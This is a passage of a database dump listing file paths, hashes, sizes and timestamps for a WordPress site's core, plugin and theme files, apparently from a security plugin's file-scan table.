0,0,'089da8932e445d81f1d4462c07fabb7683b82a8a','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'5007c97b99fc80e34575e3922d4b18c62fc49d6a167abc27a5be4eebad2df1fe','279955e5b783fcd6207144de46eecf48','',0,3830,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'08e46bdaf231b085855b5701d4768e01c3fabff5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/manager.php',2,'76662ee603e76cde644d99346ab5b31ea0e0db942beca2861c6b9fa0899dba99','e445b1c2defe94f671c15a93bce8c41d','',0,11563,33188,1,1627570491,'',''),(1629897503,1,0,0,0,0,'08e4fb90edd58ea1c807c0b0a3a735f9e7c66c2d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/icon-list.php',2,'5f19b4e9b70f844b9f50c1e5e8b393d77aaabc8d6dbf1c31675eb5765fbc97b6','f043ffd53cf05adae1b99211caa6035c','',0,17981,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'091c3d19a595efca8e836028e4feaaad788e9557','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',2,'682b3e1c01c9947731ed293cf1aa15c4a7108664539c1d08da3f2e702977be83','c6a40412dc90c6575e089c5ba51e67b9','',0,2482,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'091fd6c11274a2a9e7197da32b6190e8738dcd41','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',2,'b8fbb8b8df6e2daef7a90c0915b36bf4a0718af12a179191da17b2532531cb43','aa65623a196c782dd43cbfdd73393960','',0,53452,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'092472082e0829864e59fff7a3e63ca28cb08341','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',2,'380724e7ecdc9bfc54e146a64ce94205dde147c71bae845ee512bfe13b16e5d1','67c42bf8daa9c064deddac400cadf3fd','',0,702,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'097bc12d8599ce44d963c789831bcd5081f3cd0d','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-header-image-setting.php',1,'27a70cdc8b49ba2b6be2386b8b671c8c99963828b14b0e87997c03923c67654b','1579b8242be5ecf971103fe5d755bae1','',0,1650,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'098204cb195bbeaebddf6a6127ffb75e3ed13b37','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser-simple-xml.php',2,'d97b5a97317a155351bf448b2fb36a230e41e2ea91f4ad5a6459f552a71dfdab','02cbf151f8ac2d3c7745dbae280514da','',0,8451,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'09beb0c17452c11a8309558c5cf88ffd6dc20748','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/base-category.php',2,'c7d0b80cb29f59616a1d03dd59509acf4df512435b69f481091549b948dae6a7','5a8e66db993ca7be9f63129a07ab96e0','',0,1179,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'09c31c0b6a57cdd9d14d79200b10174c2aca1ef0','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/admin/ui/components/button.php',2,'42530ea99bffc16888347a0ce94730037248a1393c497b79712c1b1ba9d2ef1f','25d7fc7bfa879056ab99fb748795c054','',0,2328,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'09cac0fa32679ef98a763c653689a5ad9f0f1fe5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/connect/apps/library.php',2,'ae1f6614b3170837df053bcbbea350f592658dfc34c764e733e39cc514c380bb','e2efd8f5d98a24e90d4a1df20dbd3fc5','',0,2992,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'09da918fffca7375faef680e9b43a829e40ce150','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/connect/apps/common-app.php',2,'3b7ed4bd3dd41b6a01a0cb5df9501231ca3372239c7c36f6227789bdd32e4eba','dc33f08ad9e6a880d8a7a9f2a1b02f92','',0,674,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'09e86fae3b3c8fa727198de7d5d5df46149245fd','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/page-assets/data-managers/widgets-css.php',2,'6f9d89427a608923dcb88b8b11ae563c36b4f0bd7f3391cf2fe4e197c8d57098','5ab24b7b3ea55788ad6e09187acee9b4','',0,896,33188,1,1627570491,'',''),(1629897503,1,0,0,0,0,'0a0d4e554aa3469943b5d04277b95068edee61e5','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'ff0f44d534ca1a085ca503a5bc02f0fd5c8cce9ad0cdbd5ab69530497fc92f1d','ac071d8268e10c111efcfd50abd4ec14','',0,102,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'0a2a95b981dd95652d8548c7dd70858a91c07d1b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/base/widget-base.php',2,'e366097a7c3ec5c81d2173dff6246eed23836da012cbeda38eb3b9d64a61b4fe','4d1da8699a6e9b426e54fff590aba3cf','',0,28146,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'0a2d5efb11525ed90315ecaedff2baa0c1a58631','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',2,'16093a793bcb81dd71630c66b2d1bee46f39a04b4d768b8c3585bb2bb91fe121','e01df298190588c150c5cfd965968931','',0,157,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0a3ab5a54f76ca14467c392045fc6ff728d1b503','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/plugin-features.php',2,'84983bcb11dfd43b67b3595c83ab1e2ce1d610ca3ebd2110d1c13221fa5c7c59','156c842f405c2a794a6021980779c636','',0,4624,33188,1,1626250895,'',''),(1629897503,1,0,0,0,0,'0a5410b46ff01fae7f95759b7560ec174b444da8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',2,'eb00fd11be7ae9bae48b5f12bc5f66af665b5106ea6e7d8e761bd08a98081551','6cf3bf8c1a5e035a924847b325a94fa3','',0,183,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0a58d6d92bb7f7acdb4c72bf75f77c71d70612bf','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',2,'56e9d40e7720245c7e79937dd2a0cd008cb697bc8dc6f41e58477662f4c557d8','9714ea119b03046534189e2fb096949c','',0,4663,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0a66143d3caa376bff5879437ca6beba929b01c7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/editor/data/globals/endpoints/base.php',2,'e6fc06961ee3de559b35fc5a3787c8b91f7e03c3ba024a3858c1eca31cff0997','e8759dbe4182e2e5adc66be7d4c39488','',0,1479,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'0a6c82b2bbb81fd603eb3d707f035ad55f6c930c','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/url/url-flags.php',2,'6a526416cb05cd14359a33a3c4a0a61959b588a0e506258795f67f1f36606c10','dc6727737431f02b47e0b6679c2391ec','',0,4971,33188,1,1627642682,'',''),(1629897503,1,0,0,0,0,'0a6cc7fe5e200b2a76d062868807cc98300668c1','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/404.php',3,'dc72a0958640d290ed2bffa5a65e9c626a443d500c20d0ca43a485ac0a277315','d3db160967737eba211855c39b664743','',0,925,33188,1,1629806208,'',''),(1629897503,1,0,0,0,0,'0a8827b7440afe1d20f0b4cdeecb2fa212d4d175','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',2,'9e7945b8458b74d48e511d99838625c9864e488b95c516425d5a4f0174d42adf','c67ad6d83d45916f30afb45b1106f2b1','',0,925,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0aa8f5b346f9f84b3058c8486d017d6e5223f3c5','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/content/content-none.php',3,'d6fb03a98845971df2aece9cd6009144aee7cc9ba5e4f8f3be7ffa1f168ebd84','4c9d38fc7b4e97dee3ea5701954c0f12','',0,1752,33188,1,1619440191,'',''),(1629897503,1,0,0,0,0,'0ab7aed09cf3a9081f56b2f49790dbc7da21f9ea','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/structure.php',2,'b0fc3ac24b318fb067396600d7f8a079c6c522dec985982a509e8693820c1593','a3f9cf02ad78b3e92f3f157ab18f5af5','',0,2565,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'0ad7c175041368aa46697b4fb21ee2a7cc5212ac','/home/westonspirit.org.uk/public_html/wp-admin/network/plugin-install.php',1,'8c5442eeefff8dcb3baed97c9ba40a8fe1a2346c50fbbe0bcab38274ce0ed500','871c252846b1b276000b837ebb0eeb46','',0,377,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'0afd4ed7fbc63136cb09bd6702638cb3936551e2','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-ms-sites-list-table.php',1,'854c363f6e49814607a1419bdde72dec243a321810a80656fb8c1dca4f0e980e','d95b491d161849d95bde492369949a16','',0,20397,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'0b102a6ac0e3ef8684e2a44902d439237a940239','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',2,'c33f5d697b5921f417c3ab78256146a49297b1de39e7aae63cf3882508f5e30e','43bffdf5d88de9cc30d02b438f84b285','',0,2325,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0b3bd94dc958a04e4a0b32d9d41035838e740032','/home/westonspirit.org.uk/public_html/wp-includes/https-detection.php',1,'e1d7653ae6a3ce930167d9e5bdd056deff381bb2b568f4d1ecf7ac7e004bcc46','78ad355cb47286c30bd728131311dd57','',0,6871,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'0ba3a5a2f763232aad6eb9649a0ce257286a8d81','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/number.php',2,'9984422b51c9f49ae8a13e128e9b65132336e7b3a21b850d9740977b2f80b88a','c73413155dc73e22c78e983a001f49d8','',0,2152,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'0be967563165fc98001d53640132632c189517b4','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php',3,'c9d5d1641dd7576efa61b0fc06a1c06198d61ee015305ffe776ff647c23d54d5','cd35072b49364e0e2c5ede7eedfc8ec9','',0,14311,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'0bf4196679c20db985664f529b70c27d44aae668','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/latest.php',2,'7a7a339a1c88c62409052e78c63e2ded1b3efb8c75bb80bc8105906592a1e8b5','99c043d634d0ff4dd4c70cba18e1c3a4','',0,7565,33188,1,1627642680,'',''),(1629897503,1,0,0,0,0,'0bf905a4c1ee3a277cb8040a4bfcf9c39069abf9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/repeater.php',2,'a479f956dad83f7b5bc3341c7d374f5491470ac84ee9b0c8be125075b1daf3ef','c5808957d7cb3f048a916aab4e9cfbc1','',0,1156,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'0c0d2c0eb1de5d3c6864bfeeced07e138d37ba95','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',2,'0f6e94303bf3497f3b880b0e674a278f354f34c8d43e6df49aa7c5219e60f208','676ab50beb7a1137193df0c1dbff12be','',0,2274,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0c4918ea89b6f7dabd30f21750d3096064fa7e73','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/411.php',1,'970fa4ce085fc4fbbc9ad5a0aeccee8656c8ebb8df9676207361370974af8b20','27a552a1e4160c4df61b2eca5a604796','',0,399,33188,1,1624521003,'',''),(1629897503,1,0,0,0,0,'0c6e74b7ea5d76b4983d2f7794f4b56cf32976b7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',2,'c3f41815be538dbe893f9172ddb3b84ae089629fca8e2973d8918a9e0f425590','fa8b301c4f77ce0aabe1ac3c5bee511e','',0,37532,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'0ca53aaa1e77dcef1c0e9ed3a381873c758f7a7b','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php',2,'fcf08a2dd513a8ac34f0e72bbd302ac6ca3bc7e241094148ee60557ae5a4bb50','e07c54c6c27d3c6fb0c6640cf197ccd2','',0,40185,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'0cbc15674b143e516741297e7e0fff71e28d2028','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfUpdateCheck.php',2,'4077198ccfe3bb9066cf40b02e8efe5329ab17beaab038d3ab3c9850f7b33df0','263f435d9a5ccc13d9677edd4a3b3c3a','',0,19259,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0ce90c13aeade4f954bc10edbc0afe632a0dc51f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/history/views/history-panel-template.php',2,'8e4f89bfff36906aca1b1007b0ca6fdf389b4389b61f8661f5ddcc56e9c5197e','d48782b8c875afe9616f49ea4265cd1b','',0,1746,33188,1,1627570494,'',''),(1629897503,1,0,0,0,0,'0cf6343c03ec776763ac8fd69c99b0ba14bbe3fb','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/menu-anchor.php',2,'d390df1872eecdb59fc918c9f77ee06f874d77c87c898dcb6dd5fb123349513f','526adcd2e016c536f8fc1ca0fddbbb5e','',0,3137,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'0cfe670c2e4f38a4b7c3456be80821db6c0f9ede','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/.htaccess',2,'7e5fdead9a7a1043c50d689fb5794e0a6e831c772f9e1781d96796e4e758a9e4','a34522784bcaea0e7bc738f6645312b3','',0,354,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0d177d4ee8470dbfbd821fb013a3790d9c53257c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',2,'278acf9a72c8705f2c553562e41d936f62c61c5a2b36d3e691429f149d0b61ab','4b7a2b55edc1e48f1304c5b828ea355c','',0,1823,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0d1c5f20927ec98781cf7c8c0b8eecf1eda07170','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'e39e4c738d108055eaef9da2be502cd96734c15a69fbb5147bdf3978f4b5d73e','47e1705be410717d79fd0504aa310f87','',0,1460,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'0d50f08725ca87635c0e01998536505885fe1e83','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/email_unlockRequest.php',2,'2176d8e96fb7c0737d0e962728fb6c8b29ea99273eae59fc27f1759b956ac83f','1881f0a4ce817ecd9ff1ecfe616bb1d6','',0,2397,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0d534af707fc81e31a1bfe9d9a6cf291d4ee20d4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',2,'b4a40dbf8d925766133f1da0c66b54f2d4ba4d4be3e96fbcf138519d74b83b51','680139f848e9e8eb93a629c67802c1cb','',0,17010,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'0d78af0ef27aaf11f72d7d23f1e2da839cb66c77','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',2,'d12b59b7ff6fdff2746157d384ee89f721a60b3926613d5cc906c620de35412d','80fc23c915570104a6a850cde5326f59','',0,39118,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0d87f56177f751aa3d09d09190622616810d53ef','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',2,'3a727d9d4c9240a0e34cb641b97080fec8b0a980d0a13b9622f8fe8ec97f2ebc','33828df191fdeb92620728e6b58fd09a','',0,1757,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0da4d3e5b520fb02417b1c70e55c37e14bec7a94','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-filesystem-base.php',1,'0b025e27bbd706c67edd39a3ab4b534771e23865c6bb93725ff37f7088fbb027','04c014144f91cf72e3dd876faa18d403','',0,23273,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'0db46578dd89eadf7c0acef88aba3e5c4d3eebfd','/home/westonspirit.org.uk/public_html/wp-includes/ms-network.php',1,'5fbfd0c6da14945beaf3895a5021b036de5073b33348978fa84468924e223475','f7bf8e07e778ffbfbf88c133142ee69a','',0,3661,33188,1,1624521001,'',''),(1629897503,1,0,0,0,0,'0dcd75091039bce1b44ee65d7419cffda88e2cac','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-common.php',2,'800e245987969a7fcd364387763adc2242774da36b540811b2251d64261199ce','7fcdf6f6a379ecbd06cb964025fa02d9','',0,94048,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'0dd740dbef4ef320cf9bbfbd76ed35f79b121099','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-customize-section.php',1,'e3201d16facfe5a56571809816f452d86a4b5a5b458bc351e52cb9fc89db8141','a4603be9ff56ef27e406f5d328feca29','',0,10974,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'0df99a8bdd0101e02c05f0bed29886326ee2bd37','/home/westonspirit.org.uk/public_html/wp-admin/comment.php',1,'828d813140e94028a3dd920c236e9a4b5af6e1df57978228bea7c4ec680ca596','104c8d24b80392820644a8c7fa5b406f','',0,11418,33188,1,1624521014,'',''),(1629897503,1,0,0,0,0,'0e04eabc4a3d402ad80eaf38646d2b230123af98','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',2,'10903be35aa7074bc28d1fd6ef374525fcd56c78654ee5e82543fd658d50bd9d','335bab680417f7056ba9646134ee1770','',0,572,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0e087d1981d2172cfd46ff6aa6bca57cb3711bc5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',2,'b75e3ece29323434e3a62f79154bb400731faa1bcfa7b7de0ba061e598cef457','7c3ce201ad3e735abe4b03b37abe6511','',0,1342,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0e1cbbafe2e413233ac9096fe26c6698c7cb07f8','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/compatibility-tag/views/plugin-update-message-compatibility.php',2,'d0cd0bc4946ed550bacfb8afb098d7c5e7fac5d83aed1d7689cb9454e684b108','4f0ff3a0f93f073ec725f19d9663812d','',0,2070,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'0e24b41bcb298cde3311b349f5e99cb6d3e11f41','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/url/url.php',2,'c59d189e8dba092061649efe3c094755e65777a833dad977ed0b860a1c575f05','a2ed6d855c0d825144f62a2f83b26631','',0,1261,33188,1,1627642682,'',''),(1629897503,1,0,0,0,0,'0e3d7ede8e7578aa1641ea0790eb3a27047cfe40','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-dependency.php',1,'a393c32fe87aef8042754759fe66fb751c0b1665269def30657c59598cfe390e','c81ea7974e567dffe4622e27e9356d02','',0,2511,33188,1,1624521001,'',''),(1629897503,1,0,0,0,0,'0e893023587d25b4247b7d7d500a96bdc907219e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-maintenance.php',2,'60a3e3a8c35483750a76068ebbc052a281e5a8f9041f23a30c862ed89d5ee5bc','f5361e3953480ac6bbd5e32fbfc328c5','',0,7938,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'0ea91b57b73907a129500b79814363b575116c0c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/library/documents/library-document.php',2,'40624c237fdf67186e264e290d519047857bb844e628b862dbf229b12d85ae7d','361042e61ba8684e3f32fcb1aef9798a','',0,1552,33188,1,1627570494,'',''),(1629897503,1,0,0,0,0,'0eb05e1a40c81cbb4e0c3f4e505adf4e09cd9896','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/modal-search.php',3,'1e46f2914c62d17f8c80f618731055d3ccf24f55edfd60a7e41ded4842656304','dfc1bf5dc778cf81a109f72edecf508f','',0,923,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'0ee1fb938aa0b308efbf154793f0ad1c6072aaa8','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio.mp3.php',1,'7da0dc24060c9d24823157f921e45e1fca596577fe28f99f501adfd26487b2cd','8e9d4f3a42e0a68d00c87acc36786042','',0,103608,33188,1,1624521005,'',''),(1629897503,1,0,0,0,0,'0efa0abc87e0ae0d7cfa172575174782bb65592e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/block/wfBlock.php',2,'254da3ea05836f9bffe99de521230fc92a356c7e0692d5af8a39d513de97de62','ee3cbc3107079f672d4d8ef0aa40bd9e','',0,56787,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0f1ed7be84a5c6b971ff30f5623f89db1e91f5d8','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'dc14fe8533b166be85d0f9d9aa6c8289ad6a7a18d481bbf4c2fd1d81eb7cfe46','75ef3a79e31b7831191b7329ac98928b','',0,2099,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'0f3606c1f3f1693fac4174d7bb036d045c28d007','/home/westonspirit.org.uk/public_html/wp-includes/l10n.php',1,'dd486702c7f8e4a3a7d8903aa165e01dc9d3bc5c34c65b71abd9cca6ca9797e4','a5fdef28fda143e70168f68fc8190223','',0,56738,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'0f43d4a0fb495ae3459cafef0e1994d988a71d49','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-failed.php',2,'c5552c93438fcf66859ac9b3a3fed24c4d35f34d8bd7ba0d25d57ed0462bc624','192278b83bb9bee768f24feb801b8198','',0,1627,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0f4e634ec4a93217423b72050e06408c966efd84','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/inc/template-tags.php',3,'e7478922b4b9cfff41a73e2b6eb1c06002285f3ab167f4d978840e964596b600','1613c7784dbdc99e78a1e311ea8d788d','',0,22524,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'0f5b596fd983704bf0a3494ab0e194eefe58366b','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'7809943ce7c07996f2da77548d9fcafaaf41cc1c32d7f448bdb0786577a4374e','787d20f39294ef701d63b0a04be04fff','',0,108797,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'0f7e0c42b5b39fc70231964bd63736327014f1a8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',2,'8fbb550dc4a54a416277b688ad87b9a6e9d86227e0bc5923c9d86911f6d2228f','d27a3faee92817bb8545ee57751f70b9','',0,7784,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0f90c7b22080c1545d08b44b5ff31f4d2e8edac7','/home/westonspirit.org.uk/public_html/wp-includes/block-supports/typography.php',1,'d49625a62299a6d24ab6c6235606fb5476f0bd1b182c917578685c2c0765c328','d877ffce81f1766559d3031aa8c566b6','',0,3271,33188,1,1624521002,'',''),(1629897503,1,0,0,0,0,'0fa7680d3ca21e3a5f95ba8dfe7f6e6030823b80','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/export.php',2,'c8abc3b69a339b8a464c05c0bac5000758b08127abbbbcabd8b00a7541099329','98c6eae1c34f6482006b90d4f6f77687','',0,1479,33188,1,1627570489,'',''),(1629897503,1,0,0,0,0,'0fd0cc8bd2cdd7d79f34a0abf55ca4e3e2022373','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'12bfd27aea90a66f213e54ae35c2ba5843e1c14267dd588782dc53669c0a47ef','b99ce01d8d1852d13c1f826e49813c7f','',0,4792,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'0ff5301a28fa8d865c13a60fdfb222914485a27f','/home/westonspirit.org.uk/public_html/wp-includes/wp-db.php',1,'21a96e9a18f5e8cf1d98afa3e8adf9b4866b9b86f43f3fe2aff073debb7d645a','f1de79415339d8fe6916651eb2a850a1','',0,106095,33188,1,1624521001,'',''),(1629897503,1,0,0,0,0,'10186ae712f0ac68b5a092cef1cb9cc04be97104','/home/westonspirit.org.uk/public_html/wp-settings.php',4,'9e3318444a23d4632d1ecb1556b1aeb353d4c078825cf499667db125222d198a','b23184f9954adef5d4d1a1aa85cf8069','',0,21125,33188,1,1624520994,'',''),(1629897503,1,0,0,0,0,'1046ec217b573afc63b67715647a32d65b3328b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/index.php',2,'bcf7c6e44ee89ccad1f89face9503a5f9d348db4af2a1089b645679548c7c315','ea7a1bf7a63d76b0f68acc5df7d3e356','',0,28,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'106f92084d04d58d9d88b445c4dab8a3e9f35edb','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/background-task-manager.php',2,'c65464d5b44ede92260c40a069fe6519eaf7f456905bf28919fcdc942d16bbe8','674fa434d473e6ae9ac18885dd012677','',0,2532,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'10830a7ae1f6f2430e3f879826aff00522d6d9a7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',2,'e4fc4d4487a4d766d3ef14606fa0d8ff09dd7f3f0885425803d7aa7fc68e2c3d','a0899dd7d97c25fe1d872a542afa6081','',0,13459,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'10887dcf6bf8ea1f889ac723429bd541a348897c','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',2,'f085cd4663f9040ad6bd8f9381a0edb9f3ca70f516a81ad71b5e4fce18ab791e','92c7debbc4549408a9988bbc7d3214b1','',0,1534,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'1099660e623b6c880f0e2c896f4f196491c940c0','/home/westonspirit.org.uk/public_html/wp-includes/version.php',1,'a82b421f38de84d32f06b9e0b0d1a375e007ab42097c34546f0a91cc283ca7af','02a6c47ce9a41a656cc7a263f424ca1a','',0,766,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'10ce59d2704ac328f8de8632e8c1c4aeff756e91','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',2,'2474cad501ea7a71f89dca8abe1d9f4b1d834275679b3cfa6399ac1d83259648','1608988d3aafc8bd902089a0bbd65c45','',0,2681,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'10eeede5e66ab884d9ed004e12bac5822d73a9d1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',2,'22a94f8e47cbedcecd105e47a8eb7b6d5b86638f24836df97fac3e2203ea3f0d','8a5fec4ca296248c7e1e5a76568d19bc','',0,3337,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'11697ee25f887e31ddc134f7a68bc1c9f1737903','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/data/base/processor/after.php',2,'730a2bf0615316f56cf60125ed87c256eed6f51f32a8f869881dbed94dc1afd1','0ae48e413cfc94fe51886306ba178d86','',0,468,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'116983219d8dc221643f1572d7834d7a9eda3f69','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Compat.php',1,'1194a4dafef41b43f048a8009a703ae4738f6aafa3ec727f3ad04dac11d5868c','243f362f9925a4c86bfb3c6aa9c540c2','',0,134516,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'117f731c989a1c8255b1c49a0edd4093875b2f13','/home/westonspirit.org.uk/public_html/wp-admin/includes/plugin.php',1,'5991d1309439d208a74f1e679970e4316cba2dc83040171cd674c6fcaa2aa2a4','f963999029cccd7966198f8b74a1b0a5','',0,85825,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'118177c2f35630d99a542e1726c32ca5ccae2d58','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfBulkCountries.php',2,'dee496cee9ca4167d924056b86e252460afc19c7ee5f1e3d455ca11321a627fc','39091c2b